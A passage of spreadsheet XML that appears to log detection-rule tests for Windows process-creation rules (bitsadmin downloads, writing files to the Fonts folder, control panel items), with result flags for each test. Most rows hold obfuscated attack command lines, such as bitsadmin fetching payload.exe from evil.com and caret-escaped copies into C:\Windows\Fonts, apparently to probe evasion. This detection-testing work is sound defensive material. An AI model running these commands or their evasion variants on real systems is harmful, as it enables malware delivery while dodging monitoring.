      <c r="D546" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E546" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /DoWNlOAd /"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H546" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I546" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J546" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K546" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="547" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A547" s="36" t="n"/>
      <c r="B547" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C547" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D547" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E547" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /dOWnloAd /PriOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H547" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I547" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J547" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K547" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="548" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A548" s="36" t="n"/>
      <c r="B548" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C548" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D548" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E548" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /DOWNLOAd -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I548" s="36" t="n"/>
      <c r="J548" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K548" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="549" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A549" s="36" t="n"/>
      <c r="B549" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C549" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D549" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E549" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TrAnsfer myjob /downlOAd /PrioriTy normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H549" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I549" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J549" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K549" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="550" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A550" s="43" t="n"/>
      <c r="B550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C550" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D550" s="43" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E550" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /tRaNSFER myJob -"download" /PRIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I550" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J550" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K550" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="551" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A551" s="36" t="n"/>
      <c r="B551" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C551" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D551" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E551" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H551" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I551" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J551" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K551" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1" s="42">
      <c r="A552" s="36" t="n"/>
      <c r="B552" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C552" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D552" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E552" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TranSfER myJob /"download" -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H552" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I552" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J552" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K552" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="553" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A553" s="36" t="n"/>
      <c r="B553" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C553" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D553" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E553" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /PrIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H553" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I553" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J553" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K553" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1" s="42">
      <c r="A554" s="43" t="n"/>
      <c r="B554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C554" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D554" s="43" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E554" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I554" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J554" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K554" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1" s="42">
      <c r="A555" s="36" t="n"/>
      <c r="B555" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C555" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D555" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E555" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I555" s="43" t="n"/>
      <c r="J555" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K555" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="556" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A556" s="43" t="n"/>
      <c r="B556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C556" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D556" s="43" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E556" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsfER myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F556" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G556" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I556" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J556" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K556" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1" s="42">
      <c r="A557" s="36" t="n"/>
      <c r="B557" s="36" t="n"/>
      <c r="C557" s="36" t="n"/>
      <c r="D557" s="36" t="n"/>
      <c r="E557" s="43" t="n"/>
      <c r="F557" s="43" t="n"/>
      <c r="G557" s="43" t="n"/>
      <c r="H557" s="43" t="n"/>
      <c r="I557" s="43" t="n"/>
      <c r="J557" s="43" t="n"/>
    </row>
    <row r="558" ht="15.75" customHeight="1" s="42">
      <c r="A558" s="43" t="inlineStr">
        <is>
          <t>t1201</t>
        </is>
      </c>
      <c r="B558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C558" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D558" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E558" s="43" t="n"/>
      <c r="F558" s="43" t="n"/>
      <c r="G558" s="43" t="n"/>
      <c r="H558" s="43" t="n"/>
      <c r="I558" s="43" t="n"/>
      <c r="J558" s="43" t="n"/>
      <c r="K558" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="559" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A559" s="36" t="n"/>
      <c r="B559" s="36" t="n"/>
      <c r="C559" s="36" t="n"/>
      <c r="D559" s="36" t="n"/>
      <c r="E559" s="43" t="n"/>
      <c r="F559" s="43" t="n"/>
      <c r="G559" s="43" t="n"/>
      <c r="H559" s="43" t="n"/>
      <c r="I559" s="43" t="n"/>
      <c r="J559" s="43" t="n"/>
    </row>
    <row r="560" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A560" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C560" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D560" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E560" s="43" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.dll %windir%\Fonts\</t>
        </is>
      </c>
      <c r="F560" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G560" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H560" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I560" s="43" t="n"/>
      <c r="J560" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K560" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="561" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A561" s="36" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B561" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C561" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D561" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E561" s="43" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F561" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G561" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H561" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I561" s="43" t="n"/>
      <c r="J561" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K561" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="562" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A562" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B562" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C562" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D562" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E562" s="43" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F562" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G562" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H562" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I562" s="43" t="n"/>
      <c r="J562" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K562" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="563" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A563" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B563" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C563" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D563" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E563" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G563" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H563" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I563" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J563" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K563" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="564" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A564" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B564" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C564" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D564" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E564" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G564" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H564" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I564" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J564" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K564" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="565" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A565" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B565" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C565" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D565" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E565" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G565" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H565" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I565" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J565" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K565" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="566" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A566" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B566" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C566" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D566" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E566" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.vbs C:\Windows\System32\..\Fonts\</t>
        </is>
      </c>
      <c r="F566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H566" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I566" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J566" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K566" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="567" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A567" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B567" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C567" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D567" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E567" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.exe %SystemRoot%\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I567" s="36" t="n"/>
      <c r="J567" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K567" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="568" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A568" s="36" t="n"/>
      <c r="B568" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C568" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D568" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E568" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H568" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I568" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J568" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K568" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="569" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A569" s="36" t="n"/>
      <c r="B569" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C569" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D569" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E569" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /PrIORItY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H569" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I569" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J569" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K569" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="570" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A570" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B570" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C570" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D570" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E570" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe "C:\Users\Public\Downloads\malicious.cpl "</t>
        </is>
      </c>
      <c r="F570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H570" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I570" s="36" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J570" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K570" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="571" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A571" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B571" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C571" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D571" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E571" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe C:\Users\Public\Downloads\payload.dll</t>
        </is>
      </c>
      <c r="F571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H571" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I571" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J571" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K571" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="572" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A572" s="43" t="n"/>
      <c r="B572" s="36" t="n"/>
      <c r="C572" s="36" t="n"/>
      <c r="D572" s="36" t="n"/>
      <c r="E572" s="36" t="n"/>
      <c r="F572" s="36" t="n"/>
      <c r="G572" s="36" t="n"/>
      <c r="H572" s="36" t="n"/>
      <c r="I572" s="43" t="n"/>
      <c r="J572" s="36" t="n"/>
    </row>
    <row r="573" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A573" s="36" t="n"/>
      <c r="B573" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C573" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D573" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E573" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /doWnLoAD /pRiOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F573" s="36" t="b">
        <v>1</v>
      </c>
